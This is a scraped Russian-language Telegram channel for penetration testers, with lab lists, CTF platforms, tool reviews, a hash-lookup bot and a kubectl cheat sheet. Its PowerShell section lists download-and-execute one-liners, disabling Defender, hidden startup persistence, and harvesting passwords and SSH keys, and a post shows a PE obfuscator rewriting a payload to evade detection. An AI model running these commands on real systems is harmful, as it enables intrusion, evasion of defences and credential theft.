Pentest-Ground
Vulnerable apps to benchmark your scanners and your skills
Площадка с заведомо уязвимыми веб-приложениями и сетевыми сервисами. Можно использовать для проверки эффективности инструментов поиска уязвимостей или в образовательных целях
Поднятые лаборатории:
Damn Vulnerable Web Application - классическое веб приложение
Damn Vulnerable GraphQL Application - GraphQL
RestFlaw - REST API
ShadowLogic - WebLogic
CipherHeart - Redis
GuardianLeaks - веб приложение
Реверт лаб происходит каждые 30 минут
#pentest #training #dvwa #pentestground #graphql
Please open Telegram to view this post
VIEW IN TELEGRAM
Недавно был пост об отличном сервисе Weakpass у которого в наличии абсолютно бесплатный API
Прикрутил к боту Password lookup (MD5, NTLM, SHA1 или SHA256)
import requests
from aiogram import Router, F
from aiogram.types import Message
import logging
import app.config.cfg as cfg
import json
router: Router = Router()
def check_hash_string(hash_string: str):
try:
headers = {'Content-Type': 'application/json'}
url = requests.get(f'https://weakpass.com/api/v1/search/{hash_string}.json', headers=headers)
output = json.loads(url.text)
hash_info = json.dumps(output, indent=2)
return hash_info
except Exception as e:
logging.warning(e)
@router.message(F.text.startswith(cfg.all_commands['check_hash']))
async def check_hash(message: Message):
try:
msg = message.text.split()
if len(msg) == 2:
await message.answer(f'<b>{check_hash_string(msg[1])}</b>', disable_web_page_preview=True)
else:
await message.answer(f'Пример:\n<code>!check_hash 5f4dcc3b5aa765d61d8327deb882cf99</code>')
except Exception as e:
logging.warning(e)
Работает в чате канала
!check_hash 5f4dcc3b5aa765d61d8327deb882cf99#weakpass #api #bot #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Как вы уже знаете, мой предыдущий канал был заблокирован.
Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.
К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.
Вот что написано в ToS:
▪️ Не использовать мессенджер для рассылки спама или обмана пользователей;▪️ Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;▪️ Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.▪️ Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.
Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал
Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.
Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19😢2
www.warp.dev
Warp: The Agentic Development Environment
The fastest way to build with multiple AI agents, from writing code to deploying it. Trusted by over half a million engineers, Warp gives developers speed, privacy, and control to ship faster.
Современный многофункциональный терминал со встроенным AI ассистентом (free 50 запросов в неделю)
Написан на
В данный момент работает под
UPD. Подвезли поддержку
Пока только начал тестировать, немного непривычно, но довольно удобный и богатый функционал радует.
Установка via winget:
winget install Warp.Warp
Установка:
brew install --cask warp
sudo apt install ./<file>.deb
sudo dnf install ./<file>.rpm
sudo pacman -U ./<file>.pkg.tar.zst
Или добавим репозиторий и устанавливаем 1ой командой:
sudo apt install wget gpg
wget -qO- https://releases.warp.dev/linux/keys/warp.asc | gpg --dearmor > warpdotdev.gpg
sudo install -D -o root -g root -m 644 warpdotdev.gpg /etc/apt/keyrings/warpdotdev.gpg
sudo sh -c 'echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/warpdotdev.gpg] https://releases.warp.dev/linux/deb stable main" > /etc/apt/sources.list.d/warpdotdev.list'
rm warpdotdev.gpg
sudo apt update && sudo apt install warp-terminal
#warp #terminal #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Надоели мне все эти
В моем личном рейтинге занимает твердое первое место, как худшая ОС в истории, которой мне довелось пользоваться 😁😱
#windows
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🌚1
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst)🙃
Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф😁
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$😈
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь
Русскоязычная площадка😎 . Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач
Киберполигон от компании😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.
Путешествие в мир Linux, основные команды, лабы, руководства
Игра из 34 уровней для изучения Linux
Большое количество (~4000) крякми для изучения. Подойдет реверсерам
Для любителей бинарной эксплуатации (PWN)
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.
Огромное (500+) кол-во заданий в самых разных категориях
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности
Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода
Простенький хакер квест состоящий из 20 уровней
#htb #crackmes #bandit #hacking #ctf #ethical
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥5 2 2 2
Напоминаю, что по адресу @whitehat_chat находится чатик, в котором можно пообщаться и задать интересующие вас вопросы, так же там "живет" бот, обладающий полезным функционалом:
!hash a6105c0a611b41b08f1209506350279e
!ss Microsoft Exchange 2019
!poc CVE-2023-46604
!check_hash a6105c0a611b41b08f1209506350279e
!port ya.ru 80
!bridges
!feedback
!qr https://t.iss.one/wh_lab
#bot #chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Я, понятное дело за HackerLab
Проходят 5 команд
Реализовано 13 из 24 критических событий
Всем успехов и немного удачи!
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2 2 1
Высокоскоростной инструмент для пассивного сбора и эффективного обнаружения URL-адресов. От создателей nuclei, написан на
UPD. Добавили scope контроль:
SCOPE:
-us, -url-scope string[] in scope url regex to be followed by urlfinder
-uos, -url-out-scope string[] out of scope url regex to be excluded by urlfinder
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
Установка:
go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest
Запуск:
urlfinder -d tesla.com
# Match и filter
urlfinder -d tesla.com -m support -f faq
urlfinder -d tesla.com -m include-patterns.txt -f exclude-patterns.txt
# JSON export
urlfinder -d tesla.com -j
#urlfinder #soft #golang #web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
2ой день отборов
Проходят 5 команд
Реализовано 17 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Один из лучших инструментов для определения типа хеша. Написан на
UPD. Вышло большое обновление до мажорной 3.0.0 версии - changelog
Поддержка 641 хеша
7 новых типов хешей
Множественные улучшения (описания и исправления для JtR и HC)
Поддержка Ruby 3.4
Поддержка современных алгоритмов (SHA3, Keccak, Blake2, etc.)
Показывает формат для Hashcat и JohntheRipper
Работает как приложение и библиотека
Установка:
gem install haiti-hashПримеры:
haiti 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce
SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Salsa10
Salsa20
Skein-512 [JtR: skein-512]
Skein-1024(512)
Библиотека:
require 'haiti'
# Instantiate a HashIdentifier object that will automatically identify
# the hash type
hi = HashIdentifier.new('786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce')
# Loop over the hash type candidates and retrieve data
hi.type.each do |type|
name = type.name
hashcat_id = type.hashcat
john_ref = type.john
extended = type.extended
samples = type.samples
end
#haiti #hash #soft #ruby
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 2
GitHub
GitHub - DosX-dev/Astral-PE: Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64)
Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64) - DosX-dev/Astral-PE
Протектор для
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export
./Astral-PE.exe payload.exe -o payload_clean.exe
#astralpe #mutator
Please open Telegram to view this post
VIEW IN TELEGRAM
Виртуальная лаборатория, основанная на
Предустановленные лабы и инструменты:
▪️ OWASP Juice Shop▪️ WebGoat▪️ Mutillidae▪️ bWAPP▪️ DVWA▪️ Burp Suite▪️ Nikto▪️ SQLMap
#web #pentest #samurai
Please open Telegram to view this post
VIEW IN TELEGRAM
Показывает прогресс многих Coreutils инструментов, cp, mv, dd, tar, gz и т.д.
Установка в
sudo apt install progress
Использование:
watch progress -q
progress -w
watch progress -wc firefox
progress -c httpd
cp bigfile newfile & progress -mp $!
#progress #coreutils
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 2❤1 1
Заключительный день отборов
В финал пройдут 5 команд
Отчеты принимаются до 22.00
Реализовано 22 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10 2 1
Реализовано 22 из 24 критических событий
2 нерешенных таска объявляю лютейшей уцуцугой
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
Для выполнения некоторых командлетов необходим импортированный AD модуль
Подключаем:
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory
Информация о системе:
Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
Список процессов:
Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending
FailureAudit в логах:
Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}Сканер портов:
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }Выполнить команду на удаленном ПК:
Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)Скачать и выполнить скрипт:
$url = 'https://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)
Execution policy bypass:
Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1
Список доменных юзеров:
# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate
Список залогиненых юзеров:
Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username
Давно не логинились, но УЗ включена:
# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name
Прибить процесс:
Get-Process -Name "Notepad" | Stop-Process -Force
Список установленного ПО:
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate
Мониторинг изменений ФС:
$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }Отключаем Defender:
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true
Задание в планировщик для закрепа:
$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'
Поиск паролей в текстовых файлах:
Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive
Собираем SSH ключи:
Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse
Продолжение следует
#powershell #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤3 2
Forwarded from Пентестер на мотоцикле
Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!
▎ Внутри репозитория:
А какие добавленные расширения вам больше всего понравились?
Please open Telegram to view this post
VIEW IN TELEGRAM
Клон cat'a с поддержкой подсветки синтаксиса
Кроссплатформенный, написан на
По умолчанию работает как утилита less с построчным выводом. Для отключения можно сделать alias:
alias cat='bat --paging=never'
Основную функцию - конкатенацию, выполняетbat 1.txt 2.txt 3.txt > merged.txt
wget https://github.com/sharkdp/bat/releases/download/v0.25.0/bat-musl_0.25.0_musl-linux-amd64.deb
sudo dpkg -i bat-musl_0.25.0_musl-linux-amd64.deb
Если будете ставить через sudo apt install bat в зависимости от дистрибутива утилита может называться batcatwinget install sharkdp.bat
# Несколько файлов
bat src/*.rs
# Из stdin
curl -s https://sh.rustup.rs | bat
# Показать непечатные символы
bat -A /etc/hosts
tail -f /var/log/pacman.log | bat --paging=never -l log
#bat #soft #rust
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
И еще один хороший материал подъехал пол часа назад)
В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.
https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/
Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...
#pentest #redteam #sql #ad
В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.
https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/
Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...
#pentest #redteam #sql #ad
SpecterOps
Blog - SpecterOps
Your new best friend: Introducing BloodHound Community Edition!
❤8
# Get commands with basic output
kubectl get services
kubectl get pods --all-namespaces
kubectl get pods -o wide
kubectl get deployment my-dep
kubectl get pods
kubectl get pod my-pod -o yaml
# Describe commands with verbose output
kubectl describe nodes my-node
kubectl describe pods my-pod
# List Services Sorted by Name
kubectl get services --sort-by=.metadata.name
# List pods Sorted by Restart Count
kubectl get pods --sort-by='.status.containerStatuses[0].restartCount'
# List PersistentVolumes sorted by capacity
kubectl get pv --sort-by=.spec.capacity.storage
# Get the version label of all pods with label app=cassandra
kubectl get pods --selector=app=cassandra -o \
jsonpath='{.items[*].metadata.labels.version}'
# Retrieve the value of a key with dots, e.g. 'ca.crt'
kubectl get configmap myconfig \
-o jsonpath='{.data.ca\.crt}'
# Retrieve a base64 encoded value with dashes instead of underscores.
kubectl get secret my-secret --template='{{index .data "key-name-with-dashes"}}'
# Get all worker nodes (use a selector to exclude results that have a label
# named 'node-role.kubernetes.io/control-plane')
kubectl get node --selector='!node-role.kubernetes.io/control-plane'
# Get all running pods in the namespace
kubectl get pods --field-selector=status.phase=Running
# Get ExternalIPs of all nodes
kubectl get nodes -o jsonpath='{.items[*].status.addresses[?(@.type=="ExternalIP")].address}'
# List Names of Pods that belong to Particular RC
# "jq" command useful for transformations that are too complex for jsonpath, it can be found at https://jqlang.github.io/jq/
sel=${$(kubectl get rc my-rc --output=json | jq -j '.spec.selector | to_entries | .[] | "\(.key)=\(.value),"')%?}
echo $(kubectl get pods --selector=$sel --output=jsonpath={.items..metadata.name})
# Show labels for all pods (or any other Kubernetes object that supports labelling)
kubectl get pods --show-labels
# Check which nodes are ready
JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}' \
&& kubectl get nodes -o jsonpath="$JSONPATH" | grep "Ready=True"
# Check which nodes are ready with custom-columns
kubectl get node -o custom-columns='NODE_NAME:.metadata.name,STATUS:.status.conditions[?(@.type=="Ready")].status'
# Output decoded secrets without external tools
kubectl get secret my-secret -o go-template='{{range $k,$v := .data}}{{"### "}}{{$k}}{{"\n"}}{{$v|base64decode}}{{"\n\n"}}{{end}}'
# List all Secrets currently in use by a pod
kubectl get pods -o json | jq '.items[].spec.containers[].env[]?.valueFrom.secretKeyRef.name' | grep -v null | sort | uniq
# List all containerIDs of initContainer of all pods
# Helpful when cleaning up stopped containers, while avoiding removal of initContainers.
kubectl get pods --all-namespaces -o jsonpath='{range .items[*].status.initContainerStatuses[*]}{.containerID}{"\n"}{end}' | cut -d/ -f3
# List Events sorted by timestamp
kubectl get events --sort-by=.metadata.creationTimestamp
# List all warning events
kubectl events --types=Warning
# Compares the current state of the cluster against the state that the cluster would be in if the manifest was applied.
kubectl diff -f ./my-manifest.yaml
# Produce a period-delimited tree of all keys returned for nodes
# Helpful when locating a key within a complex nested JSON structure
kubectl get nodes -o json | jq -c 'paths|join(".")'
# Produce a period-delimited tree of all keys returned for pods, etc
kubectl get pods -o json | jq -c 'paths|join(".")'
# Get a deployment's status subresource
kubectl get deployment nginx-deployment --subresource=status
# dump pod logs
kubectl logs my-pod
# dump pod logs, with label name=myLabel
kubectl logs -l name=myLabel
# dump pod logs for a previous instantiation
kubectl logs my-pod --previous
# dump pod container logs (stdout, multi-container case)
kubectl logs my-pod -c my-container
kubectl logs -l name=myLabel -c my-container
kubectl logs my-pod -c my-container --previous
kubectl logs -f my-pod
#kuber #k8s #kubectl #cheatsheet
Please open Telegram to view this post
VIEW IN TELEGRAM